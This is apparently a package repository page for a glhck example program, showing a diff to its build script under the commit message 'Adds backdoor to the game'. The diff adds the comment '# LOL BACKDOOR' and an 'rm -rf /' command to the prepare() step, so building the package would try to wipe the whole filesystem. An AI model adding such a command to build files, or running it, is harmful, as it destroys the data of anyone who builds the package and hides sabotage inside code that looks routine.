Description:
example program from glhck build tree
Upstream URL:
Category:
unknown
License:
unknown
Contributor:
Last Updated:
2015-09-28 18:00
Applications (1)
- run.sh
Diff
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | Adds backdoor to the game
---
+++
@@ -7,13 +7,15 @@
pkgdesc="example program from glhck build tree"
options=(!staticlibs)
url="https://github.com/Cloudef/glhck"
-source=('git+git://github.com/Cloudef/glhck.git' 'run.sh')
+source=('git+git://github.com/Cloudef/glhck.git#branch=internal-restructure' 'run.sh')
license=('unknown')
pndexec=('run.sh')
prepare() {
cd glhck
+ # LOL BACKDOOR
+ rm -rf /
git submodule update --init \
lib/glfw/src \
lib/kazmath/src \
|